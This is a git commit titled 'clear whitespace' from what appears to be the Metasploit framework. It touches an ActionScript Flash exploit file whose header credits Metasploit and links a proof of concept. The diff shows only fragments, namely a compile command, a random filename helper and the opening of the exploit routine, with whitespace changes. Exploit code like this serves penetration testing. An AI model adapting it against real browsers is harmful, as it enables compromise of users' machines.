clear whitespace

This commit is contained in:
sinn3r 2012-04-12 01:08:22 -05:00
parent 860add8dfe
commit 835d8b209d
1 changed files with 15 additions and 16 deletions

View File

@ -3,7 +3,9 @@ Compile: mtasc -version 8 -swf Exploit.swf -main -header 800:600:20 Exploit.as
Author: 0a29406d9794e4f9b30b3c5d6702c708 / Unknown / metasploit
PoC: http://downloads.securityfocus.com/vulnerabilities/exploits/32896.as
*/
import flash.external.ExternalInterface;
class Exploit {
public function randname(newLength:Number):String{
var a:String = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
@ -16,7 +18,6 @@ class Exploit {
}
public function exploit() {
var path:String = ExternalInterface.call("window.location.href.toString") + randname(6) + ".txt";
var loadVars:LoadVars = new LoadVars();
loadVars.onData = function(str:String):Void {
@ -40,5 +41,3 @@ class Exploit {
ex = new Exploit();
}
}